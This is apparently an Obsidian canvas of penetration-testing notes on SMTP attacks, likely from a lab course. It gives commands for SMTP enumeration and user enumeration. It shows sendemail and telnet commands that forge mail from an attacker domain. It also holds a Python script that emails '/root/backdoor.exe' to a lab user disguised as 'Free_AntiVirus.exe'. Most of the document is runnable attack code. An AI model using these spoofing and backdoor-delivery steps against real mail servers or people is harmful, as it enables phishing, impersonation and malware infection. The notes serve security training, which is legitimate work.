{
	"nodes":[
		{"id":"649f8c7fba1e409c","type":"text","text":"# $ nmap \n```bash\n$ nmap --script smtp-commands <IP> -p 25 # gather the Extended commands supported by an SMTP server\n```","x":-1310,"y":184,"width":627,"height":175},
		{"id":"66817b51237baf62","type":"text","text":"# $ smtp-user-enum \n```bash\n$ smtp-user-enum -M VRFY -U users.txt -t <IP> \n$ smtp-user-enum -M EXPN -u adminl -t <IP>1 \n$ smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt \n$ smtp-user-enum -M EXPN -D example.com -U users.txt -t <IP>\n```","x":-637,"y":144,"width":717,"height":276},
		{"id":"d88d3f6f4408fec7","type":"text","text":"# $ sendmail\n```bash\n$ sendemail -f admin@attacker.xyz -t root@openmailbox.xyz -s 192.26.29.3 -u Fakemail -m \"Hi root, a fake from admin\" -o tls=no\n```","x":390,"y":144,"width":600,"height":200},
		{"id":"d4f839508ae1fe83","type":"text","text":"```bash\n$ telnet <target_IP> 25\nHELO attacker.xyz\nmail from: admin@attacker.xyz\nrcpt to:root@openmailbox.xyz\ndata\nSubject: Hi Root\nHello,\nThis is a fake mail sent using telnet command.\nFrom,\nAdmin\n.\n# There is a dot(.) in the last line which indicates the termination of data.\n```","x":610,"y":-50,"width":560,"height":240},
		{"id":"66461216c4c9a999","type":"text","text":"# python, send the malicious email to the `bob@ine.local.`\nhttps://www.geeksforgeeks.org/send-mail-attachment-gmail-account-using-python/\n```python\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders\nfromaddr = \"attacker@fake.net\"\ntoaddr = \"bob@ine.local\"  \n# instance of MIMEMultipart\nmsg = MIMEMultipart()\n# storing the senders email address  \nmsg['From'] = fromaddr\n# storing the receivers email address \nmsg['To'] = toaddr\n# storing the subject \nmsg['Subject'] = \"Subject of the Mail\"\n# string to store the body of the mail\nbody = \"Body_of_the_mail\"\n# attach the body with the msg instance\nmsg.attach(MIMEText(body, 'plain'))\n# open the file to be sent \nfilename = \"Free_AntiVirus.exe\"\nattachment = open(\"/root/backdoor.exe\", \"rb\")\n# instance of MIMEBase and named as p\np = MIMEBase('application', 'octet-stream')\n# To change the payload into encoded form\np.set_payload((attachment).read())\n# encode into base64\nencoders.encode_base64(p)\np.add_header('Content-Disposition', \"attachment; filename= %s\" % filename)\n# attach the instance 'p' to instance 'msg'\nmsg.attach(p)\n# creates SMTP session\ns = smtplib.SMTP('demo.ine.local', 25)\n# Converts the Multipart msg into a string\ntext = msg.as_string()\n# sending the mail\ns.sendmail(fromaddr, toaddr, text)\n# terminating the session\ns.quit()\n```","x":-10,"y":-347,"width":1120,"height":297},
		{"id":"13b2dd84ca130319","type":"file","file":"NOTES/99. TOOLS/Metasploit/msf_smtp.md","x":-610,"y":-380,"width":560,"height":160},
		{"id":"92ebc0d0f4ae1eea","type":"text","text":"# SMTP (T:25/465/587)\nSimple Mail Transfer Protocol","x":-1310,"y":-100,"width":400,"height":100}
	],
	"edges":[
		{"id":"626c23a38aadba19","fromNode":"92ebc0d0f4ae1eea","fromSide":"bottom","toNode":"649f8c7fba1e409c","toSide":"top","label":"$ nmap"},
		{"id":"c1900831956c46fd","fromNode":"92ebc0d0f4ae1eea","fromSide":"bottom","toNode":"66817b51237baf62","toSide":"top","label":"$ smtp-user-enum "},
		{"id":"f81672eb1e3bd224","fromNode":"92ebc0d0f4ae1eea","fromSide":"right","toNode":"d88d3f6f4408fec7","toSide":"left","label":"$ sendmail"},
		{"id":"d8cd4b2a100ba454","fromNode":"92ebc0d0f4ae1eea","fromSide":"right","toNode":"d4f839508ae1fe83","toSide":"left","label":"send fake mail with telnet"},
		{"id":"2cf7f885609035ce","fromNode":"92ebc0d0f4ae1eea","fromSide":"right","toNode":"13b2dd84ca130319","toSide":"left","label":"$ msf"},
		{"id":"b3ec0d0dbd72ab1e","fromNode":"92ebc0d0f4ae1eea","fromSide":"right","toNode":"66461216c4c9a999","toSide":"left","label":"send fake mail with python"}
	]
}